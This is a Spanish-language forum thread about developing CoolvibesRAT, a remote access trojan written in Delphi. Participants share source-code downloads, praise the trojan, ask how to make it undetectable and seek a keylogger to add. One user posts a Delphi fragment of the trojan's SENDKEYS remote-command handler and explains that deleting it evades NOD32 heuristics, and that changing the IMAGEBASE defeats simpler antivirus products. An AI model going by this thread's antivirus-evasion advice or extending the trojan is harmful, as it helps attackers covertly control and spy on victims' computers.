Hola, lo primero enhorabuena por el regreso y una pequeña consulta:
Quiero usar un programa a través de la shell remota que necesita 25 lineas de shell para mostrarse.
En una shell local basta con alargar el tamaño de la ventana para que funcione, pero en la shell remota me da siempre el mensaje de que aumente el tamaño de la shell y me preguntaba si hay algún parámetro que pueda tocar para conseguirlo. (He estado buscando en el UnitShell pero no he visto nada que me sirva).

Un saludo.
no me funciona la descarga del codigo fuente
Imagen
Gabrunix escribió:no me funciona la descarga del codigo fuente
Quien dijo eso.

ultima version

[Enlace externo eliminado para invitados] ... e4-Src.rar

saludos...
algun dia piensan volver a continuar el proyecto? estaba muy bueno el troyano era como el Latinus pero mas avanzado, nada que ver con el institution por supuesto, espero algun dia hagan otro update para seguir aprendiendo como antes, eso de las transferencias usandos hilos es una muy bueno idea, todavia me sigo rompiendo el coco tratando de entenderlo.


saludos
jw4v32 escribió:algun dia piensan volver a continuar el proyecto? estaba muy bueno el troyano era como el Latinus pero mas avanzado, nada que ver con el institution por supuesto, espero algun dia hagan otro update para seguir aprendiendo como antes, eso de las transferencias usandos hilos es una muy bueno idea, todavia me sigo rompiendo el coco tratando de entenderlo.


saludos
Hola, sigue rompiendote el coco y seguro lo entenderás y cualquier duda pregunta. Yo también tuve que romperme el coco bastante antes de lograr implementarla, sólo que no la había hecho pública hasta que vi este proyecto que me gustó tanto que decidí incluirle mi sistema de transferencias.

Aunque no de forma oficial, actualmente trabajo en algo para el Coolvibes, sólo que aún no he cuajado bien como lo haré, pero si lo logro de seguro lo postearé.

Saludos,
Unknown.
Dominicano escribió:
Gabrunix escribió:no me funciona la descarga del codigo fuente
Quien dijo eso.

ultima version

[Enlace externo eliminado para invitados] ... e4-Src.rar

saludos...
Muchas gracias, ahora mismo estoy analizando el codigo, sin duda hicieron un exelente trabajo, ojala pueda serles de ayuda algun dia eso espero, de momdento me perfeccionare en Delphi, pienso que el troyano es exelente pero el metodo de inicio polices ya no sirve por la implementacion en los antivirus que lo detecta como troyano generic a pesarde que sea indetectable, saludos
Imagen
para evadir la heuristica del NOD32 yo solo borre este codigo

Código: Seleccionar todo

  if Copy(Recibido, 1, 8) = 'SENDKEYS' then
  begin
    Delete(Recibido, 1, 9);
    TempStr := Copy(Recibido, 1, Pos('|', Recibido) - 1);
    Delete(Recibido, 1, Pos('|', Recibido));
    try
      i := StrToInt(TempStr)
    except
      begin
        Socket.SendText('MSG|Keys wasnt sended to window with handle ' + TempStr + ENTER);
        Exit;
      end;
    end;
    AppActivateHandle(i);
    SendKeys(PChar(Recibido), True);
    Socket.SendText('MSG|Keys sended to window with handle ' + TempStr + ENTER);
  end;
por supuesto que le saque la capacidad de enviar teclas a las ventanas al troyano pero parece ser solo eso lo que el NOD 3.0 detecta

pruebenlo!!! para otros Avs mas simples solo basta con cambiar el IMAGEBASE
jw4v32 escribió:para evadir la heuristica del NOD32 yo solo borre este codigo

Código: Seleccionar todo

  if Copy(Recibido, 1, 8) = 'SENDKEYS' then
  begin
    Delete(Recibido, 1, 9);
    TempStr := Copy(Recibido, 1, Pos('|', Recibido) - 1);
    Delete(Recibido, 1, Pos('|', Recibido));
    try
      i := StrToInt(TempStr)
    except
      begin
        Socket.SendText('MSG|Keys wasnt sended to window with handle ' + TempStr + ENTER);
        Exit;
      end;
    end;
    AppActivateHandle(i);
    SendKeys(PChar(Recibido), True);
    Socket.SendText('MSG|Keys sended to window with handle ' + TempStr + ENTER);
  end;
por supuesto que le saque la capacidad de enviar teclas a las ventanas al troyano pero parece ser solo eso lo que el NOD 3.0 detecta

pruebenlo!!! para otros Avs mas simples solo basta con cambiar el IMAGEBASE
Hola, la verdad no me parece buena idea quitar funcionalidades importantes, imagínate que llegue un momento en que cada antivirus deje de detectarlo si se le quita X funcionalidad, podríamos llegar a tener un trojano que no haga nada!!

Saludos,
Unknown.


Es para mí un placer anunciar que CoolvibesRat funciona perfectamente en Linux con Wine. Y el servidor también!!
Es lo primero rat que veso a funcionar plenamente en linux.

Una version en Inglés... Sería genial! Se yo pudesse apenas compilarlo...
----------------------------------------------------------------------------
It is my pleasure to announce that CoolvibesRat works perfectly in Linux with Wine. And it's server too!!
It's the first rat i see that works fully with linux.

An English version... would be great! If i only could compile it...
hola yo hice una traduccion al troyano, pero muy pobre, ya que no me llevo bien con el ingles, si alguien quiere hecharle mano para compartilo con los demas, aca esta la direccion:

[Enlace externo eliminado para invitados] ... ition.html
j4v escribió:hola yo hice una traduccion al troyano, pero muy pobre, ya que no me llevo bien con el ingles, si alguien quiere hecharle mano para compartilo con los demas, aca esta la direccion:

[Enlace externo eliminado para invitados] ... ition.html
Muchas gracias por isto!
hermoso proyecto...me encantó

solo queda hacerlo indetectable y listo
Webcam capture working or not working correct ?
esta muy bueno lastima que no tiene keylogger, si alguien encuntra alguno con gusto intentare ponerselo





Un saludo
Cerrado

Volver a “Desarrollo CoolvibesRAT”